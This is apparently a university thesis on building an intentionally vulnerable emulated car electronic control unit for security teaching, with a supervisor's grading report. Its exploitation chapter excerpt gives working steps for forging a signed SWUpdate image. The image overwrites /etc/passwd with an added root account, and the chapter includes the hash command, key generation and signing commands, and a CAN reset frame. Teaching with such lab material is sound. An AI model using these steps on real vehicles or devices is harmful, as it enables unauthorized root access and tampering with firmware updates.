Instructions

Functionality of modern car relies on dozens interconnected computer systems, so-called ECU –

electronic control unit to provide functionality like engine control, remote locking, driver assistance

etc. Increasing ECU quantity and complexity introduces potential cyber security vulnerabilities that

must be addressed by vehicle architects. Goal of the thesis would be to design and develop

intentionally vulnerable ECU that is to be used for teaching purposes in the subject BI-TAB.21.

1. Survey existing research on automotive cyber security and modern vehicle architecture.

2. Analyze potential ECU design, functionality and vulnerabilities you would like to develop. Agree the

exact scope with the thesis supervisor.

3. Implement emulated vulnerable ECU with all the functionality agreed in step 2.

4. Prepare a writeup covering all intentional vulnerabilities in the system and how to exploit them.
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Abstrakt

Moderńı vozidla obsahuj́ı rozsáhlé poč́ıtačové śıtě propojuj́ıćı množstv́ı ř́ıd́ıćıch jednotek, sen-
zor̊u a daľśıch zař́ızeńı ovládaných poč́ıtačovými systémy. S přibývaj́ıćım množstv́ı připojených
chytrých zař́ızeńı se rozšǐruje také prostor pro vznik zranitelnost́ı. S nár̊ustem zranitelnost́ı
přibývá také potřeba zajǐstěńı poč́ıtačové bezpečnosti. Pro zvýšeńı bezpečnosti je potřeba
rozumět jak systém funguje a jak jeho bezpečnost ověřit. Ćılem této práce je navržeńı a imple-
mentace zranitelné elektronické ř́ıd́ıćı jednotky, která bude zároveň s popisem zp̊usobu zneužit́ı
jej́ıch zranitelnost́ı sloužit pro výukové účely. Č́ımž nab́ıdne student̊um možnost praktickým
př́ıkladem rozš́ı̌rit své znalosti v oboru zabezpečeńı automobilových systémů.

Kĺıčová slova automotive, kybernetická, bezpečnost, ecu

Abstract

Modern vehicles contain vast computer networks connecting control units, sensors, and other
devices controlled by the computer systems. An increasing number of connected smart devices
extends the possible attack surface. An increasing number of vulnerabilities highlights the need
for cyber security. It is necessary to understand how computer systems work to increase their
security. This thesis aims to design and implement the vulnerable electronic control unit, which
will, together with the vulnerability exploitation description, be used for teaching purposes.
Providing an opportunity for students to gain practical experience to expand their cyber security
skills.

Keywords automotive, cyber, security, ecu
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Introduction

Computer security is ever increasing field reaching more and more sections of the everyday life,
as the technological progress aims to change and improve almost any action we make. It is
essential that the computer security research makes sure that the progress toward digitalization
and automation is done safely and securely.

One of many computer security specializations is the focus on the automotive industry. Mak-
ing sure that the millions of cars used every minute of each day all around the world stay secure
from threats emerging as ever more complex systems are designed and created.

The threads need to be identified and understood to be able to secure the systems. System
security can never be completely assured, but to provide a certain degree of confidence the
security researchers need to be familiar with the security issues relevant to automotive security
and know the ways how to interact with systems specific to the car industry.

This thesis aims to research, design, implement, and describe the exploitation of electronic
control unit. Results will be used for teaching purposes so that students can experience testing
parts of automotive equipment in a simulated environment.

0.1 Automotive security background

The process of making cars is a vast industrial sector, including experts from many technical
specializations. Technological progress pushes forward innovations in many areas, including cars.
The vehicles were and still are getting faster, safer, more efficient, and more comfortable. Some
of these improvements were achieved due to employing complex electronics computer systems.

To improve user experience modern cars use computer systems under the hood to enhance
the car’s driving abilities, monitor and diagnose its functions, and provide an interface the users
can interact with. This interface can be represented by an infotainment system, various control
panels with displays, diodes, knobs, and buttons, and wireless car keys up to interconnecting
smart devices like phones or tablets. All of these are handled by multiple distinct, complex, and
interconnected computer systems.

This level of complexity of such a vast system that the modern car is creates a great attack
surface. Cyber security aims to map this surface and make sure that threats are mitigated as
much as possible.

0.2 Problem definition

Searching for threads in this specific environment brings challenges. First of all, is that to test
the level of system security, the tester needs to be familiar with the tested environment. To get
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2 Introduction

the experience, the most efficient approach would be to start working with the devices used in
the automotive industry to know them better.

The problem with this approach is it would require access to expensive, specialized, propri-
etary equipment while risking that it will get damaged during the test attempts. The other
problem is that starting with a complex device or let alone testing the whole car, it might get
overwhelming and hard to understand many distinct and specific functionalities.

To start with, a car component security testing the simulated environment with some common
vulnerabilities need to be available so that they can be used for teaching and testing approaches
on how to enumerate the car networks, how to identify the vulnerabilities and how to exploit
them.

Such a simulated computer unit could present to the students commonly used tools, practices,
and vulnerabilities in a single package without risking damaging expensive equipment.

Some tools used for purposes of car system testing and simulation exist. This thesis expands
upon them to design and implement hardware devices simulating the electronic control unit and
introduces commonly used vulnerabilities and their exploitation.

0.3 Objectives
The primary objective of this thesis is to design and implement the vulnerable electronic control
unit.

The motivation behind this objective is to introduce the topic of automotive security to
students interested in topics related to the automotive cyber security.

The primary objective can be broken into multiple segments. Each segment corresponds to
the part of an assignment. Where all segments are put together to cover the general aim of
developing the vulnerable ECU.

First, to analyze the cyber security of the automotive systems with attention to modern
vehicle architecture, including analysis of car computer systems, the way they are interconnected,
and how to access them as a tester. This segment helps to get a general overview of used systems,
services, and standards used for communication, diagnostic, and control of various car computer
systems.

The next objective is to survey automotive security threats and the way they can be catego-
rized, analyzed, and tested. To investigate the attack surface created by the complex computer
network each car consists of and establish a way to approach the ECU design so that it resembles
the real-world unit.

Based on modern vehicle architecture and its security analysis, the next the objective is to
design a suitable unit that is capable of simulating vulnerable car system environment. Multi-
ple factors need to be considered when designing the unit such as usability, availability, price,
complexity, and capability to simulate a realistic car system.

After achieving the design objective, the next task is to implement it as designed on an
actual hardware device so that it can be used during the lessons. The implementation requires
expanding existing solutions so that they are capable of providing designed functions as well as
implementing agreed vulnerabilities.

The last objective is to exploit designed and implemented vulnerabilities and cover the ex-
ploitation process. The exploitation also covers the enumeration of the unit. So that the approach
is similar to the real test, where the tester might not have implementation documentation and
must rely on discovering the vulnerabilities by himself.

0.4 Significance
The results of this thesis will be used during the lessons on the Applications of Security in
Technology course, which includes topics focused on automotive security architecture.

Limitations 3

The students will be able to experience testing actual hardware devices using appropriate
hardware and software tools. This will extend the study lesson with practical experience. The
students will not only learn the theory about automotive cyber security but can also practice
the real-world security test of the electronic control unit.

0.5 Limitations
The ECUs of different manufacturers might differ, and even a single manufacturer uses multiple
different ECUs with various functionalities in a single car. The implemented project limitation
is that it is only a simulation of an actual electronic computer unit, so the scope of implemented
features differs. The design of functions supported by the ECU was selected so that it mainly
covers essential functionality needed to implement the designed vulnerabilities.

The implemented vulnerabilities might differ in exploitation complexity from the vulnerabil-
ities found in the real-world units. This has two reasons: the first is the lack of time to design,
implement, and use more complex exploitation techniques. The other reason might turn this
limitation into a feature, and that is that more straightforward vulnerability exploitation still
uses similar tools and techniques while making the example easier to present and explain.

0.6 Thesis structure
The thesis is structured into five chapters. The first two chapters cover theory used to explain
the context and background of further discussed topics as well as define and describe used tools
and protocols. The other three chapters cover the practical part of the thesis.

The first chapter is about modern vehicle architecture. It covers topics about automotive
electronics in general and also defines later used concepts, protocols and functions relevant for
electronic car components.

The second chapter explains concepts from automotive cyber security related to threat mod-
eling and attack surface. The second part of this chapter categorizes attack vectors and takes a
closer look at methods used for firmware and traffic analysis.

The third chapter starts by providing information about real-world ECUs. Followed by
defining functional requirements for the simulated ECU design. The next part describes the
hardware and software design and general design of later implemented vulnerabilities.

The fourth chapter describes the implementation details of hardware and software compo-
nents, followed by a detailed description of each used software component. The chapter ends
with a usage description of how to set up the unit.

Chapter five is the exploitation write-up. The first two sections cover how to set up the
connection with the ECU and enumerate its services. Four following sections are devoted to
vulnerability exploitation; each section covers the exploitation of one vulnerability.

[…]


Exploiting software update 55

Figure 5.1 SWUpdate web update interface

5.6.1 SWUpdate image format
The SWUpdate tool enables updating the remote system by uploading the update file in multiple
formats. One of those formats is the flexible update format. [25] This format requires the
creation of a configuration file called sw-description. This file stores information about software
versions, which file to install, and where to install it on the remote system.

Variable filename contains the name of the local file later included in the update image.
In case the SWUpdate uses a public key to validate the integrity of the uploaded file, the
sha256 variable is also required. This variable contains the SHA256 hash of the file specified in
filename. The path states where to install the file on the remote file system. A typical path
such as /usr/bin/binary-to-update would be used to replace the binary with its new version.

5.6.2 Exploitation update file
To escalate privileges, the attacker can exploit the SWUpdate’s elevated privileges to replace any
file present on the remote system. In this case, the /etc/passwd file is replaced with a version
that contains an additional user with root privileges. Uploading an updated version of this file
creates a new priviledged user account under control of the attacker on the remote system. The
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Code listing 5.12 Content of sw-description file

software =
{

version = "1.0.1";
raspbian = {

hardware -compatibility: [ "1.0" ];
files: (

{
filename = "SWUpdate";
path = "/etc/passwd";
sha256 = "720 c39e7877bc3085a97ad3f610b04e7b9e04ccccc1ce08ae7eca5

38 b16d2060";
}

);
};

}

attacker with remote access obtained by exploiting the buffer overflow vulnerability can switch
to the new user account to elevate the privileges.

The /etc/passwd consist from copy of original version of the file extented with following line:
hacker:$1$hacker$5mIZLwyyJPgBRRNtKnlyO.:0:0::/root:/bin/bash
The first field delimited by a colon states the new user name; the second field is password

salt and hash. The new password is root salted with the same word used as a new user name –
hacker. The hash was generated by command:

$ openssl passwd -1 -salt hacker root
A software update image can be created from those two files, but such a file is rejected by

the SWUpdate since it was launched with the public key, and therefore it accepts only images
signed with the corresponding private key.

5.6.3 Signing forged update
The attacker is able to control the public key file on the remote system. This can be exploited
by creating new key pair under attacker control, signing the image with a new private key, and
replacing a remotely used public key with the attacker’s new public key. Attacker’s new key will
be used once the SWUpdate is restarted.

The process of key pair generation and image signing is shown in the listing 5.13.
After creation of signed image file called forged-update-image-v1-signed.swu the attacker

needs to replaces content of /home/bot/swupdate-public.pem with used attacker public key
(forged-swupdate-public.pem). Once the key is replaced, the attacker needs to restart the
UDS service. The restart can be achieved simply by sending ECU reset frame:

$ cansend can0 ’7df#0210010000000000’
Restarted the UDS server will be once again in the default session. The attacker needs to

once again start the SWUpdate by exploiting the reused seed once more as described in 5.5.
Uploading the image now will result in success and adds a new priviledged user account. The

attacker can use su command to switch to hacker account and use root privileges.
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Code listing 5.13 Generating new key pair and sighning the malicious image

$ # GENERATING PRIVATE KEY
$ openssl genrsa -out forged -swupdate -priv.pem

$ # GENERATING MATCHING PUBLIC KEY
$ openssl rsa -in forged -swupdate -priv.pem \

-out forged -swupdate -public.pem -outform PEM -pubout

$ # GENERATING SIGNATURE FILE
$ openssl dgst -sha256 -sign forged -swupdate -priv.pem sw -description \

> sw-description.sig

$ # GENERATING SIGNED IMAGE
$ for i in sw -description sw-description.sig SWUpdate; do echo $i; done \

| cpio -ov -H crc > forged -update -image -v1-signed.swu
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Chapter 6

Conclusion

The thesis aimed to develop a vulnerable electronic control unit to be used as a part of computer
security lectures. The more general goal is increasing overall knowledge of automotive systems
and their security threats.

After surveying modern vehicle architecture, its computer systems, and networks from a cyber
security perspective, the hardware, and software for the simulated electronic control unit were
designed. Hardware design consists of single-board computer with extension board providing
support for CAN interface. The selected software implements the functionality of the UDS
server with multiple services, a single application receiving and storing messages, a software
update feature, and CAN traffic simulator.

Security vulnerabilities were designed to correspond with possible security issues of car com-
puter systems. In total, four major vulnerabilities were implemented. Arbitrary file read using
path traversal in undocumented service, buffer overflow, vulnerable seed-key algorithm, and
forged software update. The exploitation of implemented vulnerabilities was covered in the last
chapter.

The hardware and software components simulating the functionality of real-world automo-
tive ECU were researched, designed, and implemented. Common vulnerabilities relevant to the
systems used in the car industry were included in the development. Vulnerability exploitation
was covered step by step, demonstrating security issues. Problems related to automotive cyber
security can be demonstrated using the developed device.

This work could be further extended by implementing additional features. New hardware
units or controllers could be connected or software services supported to resemble the actual car
network even more.

While implementing only a small sample of car systems, the implemented ECU can be used
as a practical example of a specialized computer equipment that most students might never have
a chance to examine.
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readme.txt.................................................description of media content
src

capture.pcapng.........................................captured CAN traffic sample
pi key ............................................................... private ssh key
pi-image.rar.................................................compressed disk image
pi-source.tar.gz...................................................source code files
update-image.rar....................................SWUpdate image files and keys
python-scripts

buffer-of.py ..................................... script exploiting buffer overflow
file-download.py.............................script exploiting arbitrarily file read
seed.py..............................script exploiting vunlerable seed-key algoritm

thesis.........................................................thesis source code LATEX
pic .................................................................... thesis figures
text...............................................................thesis source text
assignment-include.pdf...........................................thesis assignment
ctufit-thesis.cls................................................thesis source code
ctufit-thesis.tex................................................thesis source code

thesis.pdf.................................................................thesis PDF
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