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Evaluation criteria

1. Fulfillment of the assignment

▶ [1] assignment fulfilled
[2] assignment fulfilled with minor objections
[3] assignment fulfilled with major objections
[4] assignment not fulfilled

Student has fulfilled the assignment completely. Outcome of the practical part of the
thesis is intentionally vulnerable ECU that can be used to teach automotive cyber security
concepts. Incorporated vulnerabilities were agreed with thesis supervisor and
implemented correctly.

2. Main written part 55 /100 (E)

Thesis is not very well written. Although high-level structure of the thesis is good,
individual subsections are sometimes poorly written or chosen. Written part of the thesis
was obviously completed under significant time pressure with limited space for
proofreading and error correction. Example of poorly chosen structure is for instance
subsection 1.3.1 Software updates that is quite out of context under 1.3 Electronic control
unit section. Example of poor writing style is occasional occurrence of sentences that do
not make sense like: “This is engineering in a way how to implement the software update
itself or logistics problem how to deliver the update to each car.”

3. Non-written part, attachments 95 /100 (A)

Developed vulnerable ECU is of a very good quality. Device is stable, all vulnerabilities are
stable and repeatedly exploitable by accompanied exploit script. Student also prepared a
presentation slides describing all ECU vulnerabilities and how to exploit them, which may
be used for teaching purposes. The only reason for 95 points instead of 100 are some
minor omissions in the presentation slides.

4. Evaluation of results, publication outputs and awards 75 /100 (C)

Practical part of the thesis could and certainly would be deployed in practice. Written part
of the thesis would need to be improved for publishing.

5. Activity of the student

[1] excellent activity
[2] very good activity

▶ [3] average activity
[4] weaker, but still sufficient activity
[5] insufficient activity

Student demonstrated great independence while resolving individual technical
challenges, but he often struggled to meet individual deadlines and to adequately
distribute the workload over longer period of time.

6. Self-reliance of the student

[1] excellent self-reliance
[2] very good self-reliance

▶ [3] average self-reliance
[4] weaker, but still sufficient self-reliance
[5] insufficient self-reliance

Student certainly has a good self-reliance when it comes to resolving technical
challenges, but he needs to improve his project management skills.

The overall evaluation 75 /100 (C)

Practical part of the thesis is very good. Developed device is stable, all vulnerabilities are
stable and repeatedly exploitable by accompanied exploit script. Practical part could be
evaluated as excellent. Unfortunately, the thesis is not very well written. It was obviously
completed under significant time pressure with limited space for proofreading and error
correction. Overall, taking into account both practical and written part, I suggest the final
grade C.

Instructions

Fulfillment of the assignment

Assess whether the submitted FT defines the objectives sufficiently and in line with the assignment;
whether the objectives are formulated correctly and fulfilled sufficiently. In the comment, specify the
points of the assignment that have not been met, assess the severity, impact, and, if appropriate, also the
cause of the deficiencies. If the assignment differs substantially from the standards for the FT or if the
student has developed the FT beyond the assignment, describe the way it got reflected on the quality of
the assignment’s fulfilment and the way it affected your final evaluation.

Main written part

Evaluate whether the extent of the FT is adequate to its content and scope: are all the parts of the FT
contentful and necessary? Next, consider whether the submitted FT is actually correct – are there factual
errors or inaccuracies?

Evaluate the logical structure of the FT, the thematic flow between chapters and whether the text is
comprehensible to the reader. Assess whether the formal notations in the FT are used correctly. Assess
the typographic and language aspects of the FT, follow the Dean’s Directive No. 52/2021, Art. 3.

Evaluate whether the relevant sources are properly used, quoted and cited. Verify that all quotes are
properly distinguished from the results achieved in the FT, thus, that the citation ethics has not been
violated and that the citations are complete and in accordance with citation practices and standards.
Finally, evaluate whether the software and other copyrighted works have been used in accordance with
their license terms.

Non-written part, attachments

Depending on the nature of the FT, comment on the non-written part of the thesis. For example: SW work
– the overall quality of the program. Is the technology used (from the development to deployment)
suitable and adequate? HW – functional sample. Evaluate the technology and tools used. Research and
experimental work – repeatability of the experiment.

Evaluation of results, publication outputs and awards

Depending on the nature of the thesis, estimate whether the thesis results could be deployed in
practice; alternatively, evaluate whether the results of the FT extend the already published/known results
or whether they bring in completely new findings.

Activity of the student

From your experience with the course of the work on the thesis and its outcome, review the student’s
activity while working on the thesis, his/her punctuality when meeting the deadlines and whether he/
she consulted you as he/she went along and also, whether he/she was well prepared for these
consultations.

Self-reliance of the student

From your experience with the course of the work on the thesis and its outcome, assess the student’s
ability to develop independent creative work.

The overall evaluation

Summarize which of the aspects of the FT affected your grading process the most. The overall grade
does not need to be an arithmetic mean (or other value) calculated from the evaluation in the previous
criteria. Generally, a well-fulfilled assignment is assessed by grade A.
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